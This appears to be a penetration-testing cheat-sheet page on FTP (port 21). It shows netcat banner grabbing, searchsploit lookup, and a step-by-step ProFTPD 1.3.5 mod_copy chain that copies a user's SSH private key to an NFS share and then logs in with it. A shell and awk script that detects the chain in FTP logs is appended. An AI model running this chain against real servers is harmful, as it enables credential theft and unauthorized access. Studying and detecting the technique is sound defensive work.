Defender's Notes

21 - ftp

Enumeration

Use netcat to grab the FTP banner and identify the server version

nc $IP 21

Use searchsploit to look up Exploit-DB entries for that FTP server version

searchsploit ftp 1.2.3

Exploitation examples

ProFTPD 1.3.5 mod_copy

ProFTPD 1.3.5 has a vulnerability in its mod_copy module that allows the SITE CPFR and SITE CPTO commands to be used via netcat to copy files. In this example we chain this exploit to copy Bob's SSH keys to a misconfigured NFS share, then mount the share on our attack machine, giving access to the SSH keys.

# Use netcat to copy the file into an NFS share
nc $IP 21
# 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [<IP>]
SITE CPFR /home/bob/.ssh/id_rsa
# 350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
# 250 Copy successful

# Mount the nfs share and get bob's keys
mkdir nfs
sudo mount $IP:/var nfs
cp nfs/tmp/id_rsa id_rsa
sudo umount nfs

# Use SSH to log into a host
chmod 600 id_rsa
ssh -i id_rsa bob@$IP
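
Detection for the chain above, as an added example that is not part of the original page: it pairs each accepted SITE CPFR with the following SITE CPTO from the same client and raises the severity when the session never logged in, the source is key material, or the destination sits under an NFS-exported path. The log line layout, the function names `sample_log` and `detect_mod_copy`, and the sample lines are assumptions constructed for this example; `/var` is the exported path from the walkthrough.

```shell
#!/bin/sh
# Added example. Assumed (constructed) FTP command log layout, one line per command:
#   <time> <client-ip> <user or - if not logged in> "<command>" <reply-code>

sample_log() {
    # Constructed sample input, not real log data
    cat <<'EOF'
2024-01-10T10:00:01Z 203.0.113.7 - "SITE CPFR /home/bob/.ssh/id_rsa" 350
2024-01-10T10:00:02Z 203.0.113.7 - "SITE CPTO /var/tmp/id_rsa" 250
2024-01-10T10:05:00Z 198.51.100.4 alice "RETR report.txt" 226
2024-01-10T10:06:00Z 198.51.100.9 carol "SITE CPFR /srv/ftp/a.txt" 350
2024-01-10T10:06:01Z 198.51.100.9 carol "SITE CPTO /srv/ftp/b.txt" 250
2024-01-10T10:07:00Z 203.0.113.7 - "SITE CPFR /etc/shadow" 550
EOF
}

# Reads log lines on stdin; $1 = NFS-exported path prefix (defaults to /var).
detect_mod_copy() {
    awk -F'"' -v exported="${1:-/var}" '
    {
        split($1, head, " "); ip = head[2]; user = head[3]
        code = $3 + 0
        verb = toupper(substr($2, 1, 10)); path = substr($2, 11)
        # 350 = server accepted the source path and waits for a destination
        if (verb == "SITE CPFR " && code == 350) { src[ip] = path; next }
        # 250 = copy completed; report it together with the remembered source
        if (verb == "SITE CPTO " && code == 250 && (ip in src)) {
            why = ""
            if (user == "-") why = why "unauthenticated,"
            if (src[ip] ~ /\/\.ssh\/|^\/etc\/shadow$/) why = why "sensitive-source,"
            if (index(path, exported "/") == 1) why = why "dest-on-export,"
            sev = (why == "") ? "INFO" : "HIGH"
            sub(/,$/, "", why)
            printf "%s %s %s %s -> %s [%s]\n", sev, ip, user, src[ip], path, why
            delete src[ip]
        }
    }'
}

sample_log | detect_mod_copy /var
```

Any HIGH line means a file left its owner's directory through the FTP daemon; on a host that still needs FTP, removing mod_copy from the build or module list and tightening the NFS export closes both halves of the chain.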

Last updated 4 years ago